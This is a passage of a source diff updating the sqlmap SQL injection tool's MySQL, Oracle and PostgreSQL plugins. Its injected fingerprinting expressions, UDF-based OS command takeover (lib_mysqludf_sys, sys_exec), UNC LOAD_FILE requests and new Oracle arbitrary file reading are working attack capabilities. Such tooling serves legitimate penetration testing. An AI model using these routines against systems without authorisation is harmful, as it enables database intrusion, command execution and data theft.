inject.checkBooleanExpression("COALESCE(SESSION_USER(),USER()) IS NOT NULL") + + if not result: + # Note: MemSQL doesn't support SESSION_USER() + result = inject.checkBooleanExpression("GEOGRAPHY_AREA(NULL) IS NULL") + + if result: + hashDBWrite(HASHDB_KEYS.DBMS_FORK, FORK.MEMSQL) if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 + kb.data.has_information_schema = True + + # Determine if it is MySQL >= 9.0.0 + if inject.checkBooleanExpression("ISNULL(VECTOR_DIM(NULL))"): + Backend.setVersion(">= 9.0.0") + setDbms("%s 9" % DBMS.MYSQL) + self.getBanner() + + # Determine if it is MySQL >= 8.0.0 + elif inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"): + Backend.setVersion(">= 8.0.0") + setDbms("%s 8" % DBMS.MYSQL) + self.getBanner() + # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,%s,%s))" % (randInt, randInt)): - 
kb.data.has_information_schema = True + elif inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): Backend.setVersion(">= 5.0.0") setDbms("%s 5" % DBMS.MYSQL) self.getBanner() @@ -198,19 +237,27 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.MYSQL logger.info(infoMsg) - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") + # Check if it is MySQL >= 5.7 + if inject.checkBooleanExpression("ISNULL(JSON_QUOTE(NULL))"): + Backend.setVersion(">= 5.7") + + # Check if it is MySQL >= 5.6 + elif inject.checkBooleanExpression("ISNULL(VALIDATE_PASSWORD_STRENGTH(NULL))"): + Backend.setVersion(">= 5.6") + + # Check if it is MySQL >= 5.5 + elif inject.checkBooleanExpression("TO_SECONDS(950501)>0"): + Backend.setVersion(">= 5.5") # Check if it is MySQL >= 5.1.2 and < 5.5.0 elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)): + if inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.12", "< 5.5.0"]) - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.7", "< 5.1.12"]) - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"): Backend.setVersion("= 5.1.6") - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.5", "< 5.1.6"]) else: Backend.setVersionList([">= 5.1.2", "< 5.1.5"]) @@ -220,7 +267,7 @@ def checkDbms(self): Backend.setVersionList([">= 5.0.38", "< 5.1.2"]) elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"): Backend.setVersionList([">= 5.0.19", "< 5.0.38"]) - elif not inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL WHERE %s!=%s)" % (randInt, randInt, randInt, randInt)): + elif not inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"): Backend.setVersionList([">= 5.0.11", "< 5.0.19"]) elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"): Backend.setVersionList([">= 5.0.6", "< 5.0.11"]) @@ -229,7 +276,6 @@ def checkDbms(self): else: Backend.setVersionList([">= 5.0.0", "< 5.0.3"]) - # For cases when information_schema is missing elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): Backend.setVersion(">= 5.0.2") setDbms("%s 5" % DBMS.MYSQL) @@ -240,6 +286,8 @@ def checkDbms(self): setDbms("%s 4" % DBMS.MYSQL) self.getBanner() + kb.data.has_information_schema = False + if not conf.extensiveFp: return True @@ -262,10 +310,12 @@ def checkDbms(self): setDbms("%s 3" % DBMS.MYSQL) self.getBanner() + kb.data.has_information_schema = False + return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/mysql/syntax.py 
b/plugins/dbms/mysql/syntax.py index f1ff5afc9d5..fefe4d88b1a 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,27 +1,31 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import binascii -from lib.core.convert import utf8encode +from lib.core.convert import getBytes +from lib.core.convert import getOrds +from lib.core.convert import getUnicode from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 0x6162636465666768 FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CONVERT(0x61626364c3ab666768 USING utf8) FROM foobar" + True + """ + def escaper(value): - retVal = None - try: - retVal = "0x%s" % binascii.hexlify(value.strip("'")) - except UnicodeEncodeError: - retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value.strip("'"))) - return retVal + if all(_ < 128 for _ in getOrds(value)): + return "0x%s" % getUnicode(binascii.hexlify(getBytes(value))) + else: + return "CONVERT(0x%s USING utf8)" % getUnicode(binascii.hexlify(getBytes(value, "utf8"))) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 41ebd1135f8..81851506412 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,24 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import re +import os from lib.core.agent import agent from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import decloakToTemp +from lib.core.common import isStackingAvailable +from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import randomStr from lib.core.common import unArrayizeValue +from lib.core.compat import LooseVersion from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import OS -from lib.core.enums import PAYLOAD from lib.request import inject from lib.request.connect import Connect as Request from plugins.generic.takeover import Takeover as GenericTakeover @@ -27,6 +29,7 @@ class Takeover(GenericTakeover): def __init__(self): self.__basedir = None self.__datadir = None + self.__plugindir = None GenericTakeover.__init__(self) @@ -35,39 +38,44 @@ def udfSetRemotePath(self): banVer = kb.bannerFp["dbmsVersion"] - # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 - if banVer >= "5.1.19": - if self.__basedir is None: + if banVer and LooseVersion(banVer) >= LooseVersion("5.0.67"): + if self.__plugindir is None: + logger.info("retrieving MySQL plugin directory absolute path") + self.__plugindir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir")) + + # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 + if self.__plugindir is None and LooseVersion(banVer) >= LooseVersion("5.1.19"): 
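
The rewritten MySQL escaper above turns quoted strings into bare hex literals when they are pure ASCII and into CONVERT(0x... USING utf8) otherwise, as the new doctests show. A simplified standalone approximation using only the standard library (it skips the quote handling that Syntax._escape performs and takes the raw string value directly):

# sketch: hex-encode a string value the way the doctests describe
import binascii

def escape_value(value):
    data = value.encode("utf-8")
    hexed = binascii.hexlify(data).decode("ascii")
    if all(ord(ch) < 128 for ch in value):
        return "0x%s" % hexed                     # plain ASCII: bare hex literal
    return "CONVERT(0x%s USING utf8)" % hexed     # non-ASCII: force utf8 interpretation

print(escape_value("abcdefgh"))       # 0x6162636465666768
print(escape_value(u"abcd\xebfgh"))   # CONVERT(0x61626364c3ab666768 USING utf8)
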
logger.info("retrieving MySQL base directory absolute path") # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir self.__basedir = unArrayizeValue(inject.getValue("SELECT @@basedir")) - if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I): + if isWindowsDriveLetterPath(self.__basedir or ""): Backend.setOs(OS.WINDOWS) else: Backend.setOs(OS.LINUX) - # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin - if Backend.isOs(OS.WINDOWS): - self.__basedir += "/lib/plugin" - else: - self.__basedir += "/lib/mysql/plugin" + # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin + if Backend.isOs(OS.WINDOWS): + self.__plugindir = "%s/lib/plugin" % self.__basedir + else: + self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir + + self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' - self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir)) - self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt) + self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file else: - #logger.debug("retrieving MySQL data directory absolute path") + # logger.debug("retrieving MySQL data directory absolute path") # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir - #self.__datadir = inject.getValue("SELECT @@datadir") + # self.__datadir = inject.getValue("SELECT @@datadir") # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = "." + self.__datadir = '.' 
self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, @@ -79,10 +87,12 @@ def udfSetLocalPaths(self): self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) if Backend.isOs(OS.WINDOWS): - self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch() + _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_") + self.udfLocalFile = decloakToTemp(_) self.udfSharedLibExt = "dll" else: - self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch() + _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_") + self.udfLocalFile = decloakToTemp(_) self.udfSharedLibExt = "so" def udfCreateFromSharedLib(self, udf, inpRet): @@ -100,7 +110,7 @@ def udfCreateFromSharedLib(self, udf, inpRet): logger.debug("keeping existing UDF '%s' as requested" % udf) def uncPathRequest(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if not isStackingAvailable(): query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index 1a09a1be9e2..cedb15250e4 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = ORACLE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.ORACLE] = Syntax.escape diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index a536d5fa55f..0d011fb8afd 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: - import cx_Oracle + import oracledb except ImportError: pass import logging import os -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -23,52 +24,48 @@ class Connector(GenericConnector): """ - Homepage: http://cx-oracle.sourceforge.net/ - User guide: http://cx-oracle.sourceforge.net/README.txt - API: http://cx-oracle.sourceforge.net/html/index.html - License: http://cx-oracle.sourceforge.net/LICENSE.txt + Homepage: https://oracle.github.io/python-oracledb/ + User: https://python-oracledb.readthedocs.io/en/latest/ + License: https://github.com/oracle/python-oracledb/blob/main/LICENSE.txt """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() - self.__dsn = cx_Oracle.makedsn(self.hostname, 
self.port, self.db) - self.__dsn = utf8encode(self.__dsn) - self.user = utf8encode(self.user) - self.password = utf8encode(self.password) + + self.user = getText(self.user) + self.password = getText(self.password) try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) + dsn = oracledb.makedsn(self.hostname, self.port, service_name=self.db) + self.connector = oracledb.connect(user=self.user, password=self.password, dsn=dsn, mode=oracledb.AUTH_MODE_SYSDBA) logger.info("successfully connected as SYSDBA") - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError): + except oracledb.DatabaseError: + # Try again without SYSDBA try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError), msg: - raise SqlmapConnectionException(msg) + self.connector = oracledb.connect(user=self.user, password=self.password, dsn=dsn) + except oracledb.DatabaseError as ex: + raise SqlmapConnectionException(ex) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except cx_Oracle.InterfaceError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) + except oracledb.InterfaceError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except cx_Oracle.DatabaseError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) + except oracledb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) self.connector.commit() - return retVal def select(self, query): diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index 3344870d94a..96b1a262cd2 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -1,38 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isAdminFromPrivileges from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import CURRENT_USER from lib.request import inject from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getRoles(self, query2=False): infoMsg = "fetching database users roles" - rootQuery = queries[Backend.getIdentifiedDbms()].roles + rootQuery = queries[DBMS.ORACLE].roles - if conf.user == "CU": + if conf.user 
== CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -50,14 +49,14 @@ def getRoles(self, query2=False): condition = rootQuery.inband.condition if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) values = inject.getValue(query, blind=False, time=False) if not values and not query2: - infoMsg = "trying with table USER_ROLE_PRIVS" + infoMsg = "trying with table 'USER_ROLE_PRIVS'" logger.info(infoMsg) return self.getRoles(query2=True) @@ -67,7 +66,7 @@ def getRoles(self, query2=False): user = None roles = set() - for count in xrange(0, len(value)): + for count in xrange(0, len(value or [])): # The first column is always the username if count == 0: user = value[count] @@ -86,7 +85,7 @@ def getRoles(self, query2=False): if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') else: if not len(kb.data.cachedUsers): users = self.getUsers() @@ -118,14 +117,14 @@ def getRoles(self, query2=False): if not isNumPosStrValue(count): if count != 0 and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" + infoMsg = "trying with table 'USER_SYS_PRIVS'" logger.info(infoMsg) return self.getPrivileges(query2=True) warnMsg = "unable to retrieve the number of " warnMsg += "roles for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) continue infoMsg = "fetching roles for user '%s'" % user @@ -150,7 +149,7 @@ def getRoles(self, query2=False): else: warnMsg = "unable to retrieve the roles " warnMsg += "for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index d276a2f5fec..197b9bddc99 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,23 +1,59 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import dataToOutFile +from lib.core.common import decodeDbmsHexValue +from lib.core.common import getSQLSnippet +from lib.core.common import isNoneValue +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.request import inject +from lib.request.connect import Connect as Request from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) + def readFile(self, remoteFile): + localFilePaths = [] + snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension") - def readFile(self, rFile): - errMsg = "File system read access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) + for query in snippet.split("\n"): + query = query.strip() + query = agent.prefixQuery("OR (%s) IS NULL" % query) + query = agent.suffixQuery(query, trimEmpty=False) + payload = agent.payload(newValue=query) + Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) + + for remoteFile in remoteFile.split(','): + if 
not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) + + kb.fileReadMode = True + fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL) + kb.fileReadMode = False + + if not isNoneValue(fileContent): + fileContent = decodeDbmsHexValue(fileContent, True) + + if fileContent.strip(): + localFilePath = dataToOutFile(remoteFile, fileContent) + localFilePaths.append(localFilePath) + + elif not kb.bruteMode: + errMsg = "no data retrieved" + logger.error(errMsg) + + return localFilePaths - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "File system write access not yet implemented for " errMsg += "Oracle" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 29b5b05d5ca..5eacf432461 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,18 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.session import setDbms from lib.core.settings import ORACLE_ALIASES from lib.request import inject @@ -23,6 +27,16 @@ def __init__(self): GenericFingerprint.__init__(self, DBMS.ORACLE) def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("NULL_EQU(NULL,NULL)=1"): + fork = FORK.DM8 + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) @@ -39,6 +53,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += DBMS.ORACLE + if fork: + value += " (%s fork)" % fork return value actVer = Format.getDbms() @@ -46,19 +62,24 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): setDbms(DBMS.ORACLE) self.getBanner() @@ -68,27 +89,27 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database + # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # not work connecting directly to 
the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if result: infoMsg = "confirming %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") + result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -102,9 +123,10 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.ORACLE logger.info(infoMsg) - for version in ("11i", "10g", "9i", "8i"): - number = int(re.search("([\d]+)", version).group(1)) - output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION), 1, %d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) + # Reference: https://en.wikipedia.org/wiki/Oracle_Database + for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"): + number = int(re.search(r"([\d]+)", version).group(1)) + output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) if output: Backend.setVersion(version) @@ -113,7 +135,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index 3cd775e577d..91e255219dc 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||NCHR(235)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("%s(%d)" % ("CHR" if ord(value[i]) < 256 else "NCHR", ord(value[i])) for i in xrange(len(value))) + return "||".join("%s(%d)" % ("CHR" if _ < 128 else "NCHR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index b47e1fbcecf..6bc5cd16a24 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ 
from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "Operating system command execution functionality not " errMsg += "yet implemented for Oracle" diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 0688fc29b85..68ea7cb1f7c 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,18 +23,14 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, def __init__(self): self.excludeDbsList = PGSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": ["text"], "return": "int4" }, - "sys_eval": { "input": ["text"], "return": "text" }, - "sys_bineval": { "input": ["text"], "return": "int4" }, - "sys_fileread": { "input": ["text"], "return": "text" } - } + # UDF name: UDF parameters' input data-type and return data-type + "sys_exec": {"input": ["text"], "return": "int4"}, + "sys_eval": {"input": ["text"], "return": "text"}, + "sys_bineval": {"input": ["text"], "return": "int4"}, + "sys_fileread": {"input": ["text"], "return": "text"} + } - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.PGSQL] = Syntax.escape diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index 1caf426029c..4a71bf15bb6 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers 